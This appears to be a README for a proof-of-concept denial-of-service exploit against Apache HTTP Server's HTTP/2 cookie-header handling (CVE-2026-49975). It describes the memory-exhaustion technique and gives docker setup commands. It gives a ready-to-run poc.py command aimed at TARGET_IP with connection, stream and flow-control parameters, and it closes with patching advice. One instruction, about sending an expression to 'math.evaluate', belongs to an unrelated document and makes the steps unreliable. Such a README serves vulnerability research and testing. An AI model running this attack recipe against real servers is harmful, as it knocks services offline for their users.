★ CVE-2026-49975 HTTP/2 Bomb PoC ★
CVE-2026-49975_Demo.mp4
CVE-2026-49975 is a Denial of Service (DoS) vulnerability in Apache HTTP Server. The vulnerability occurs in the HTTP/2 request handling path, where multiple
cookieheader fields can be merged without being properly counted againstLimitRequestFields. By sending a small HPACK-encoded HTTP/2 request that expands into manycookieheader fields, an attacker can force the server to repeatedly allocate memory during Cookie header merging. The attacker can then use HTTP/2 flow control to delay response transmission, keeping the affected streams open and preventing the allocated memory from being released.
| Category | Version |
|---|---|
| Vulnerable | Apache HTTP Server 2.4.17 ≤ version ≤ 2.4.67 |
| Patched | Apache HTTP Server 2.4.68 or later |
- Remote Denial of Service (DoS)
- Excessive memory consumption
- Delayed or failed processing of normal user requests
Build and run the vulnerable Apache HTTP Server environment.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975After starting the vulnerable environment, follow the steps below to reproduce the attack.
docker stats cve-2026-49975Example output:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
Send the following expression to math.evaluate (e.g., through the application's calculation input).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
Check that the Apache container's memory usage increases and remains high while the attack streams are held open.
- Upgrade Apache HTTP Server to 2.4.68 or later
- Consider disabling HTTP/2 temporarily if the service does not require it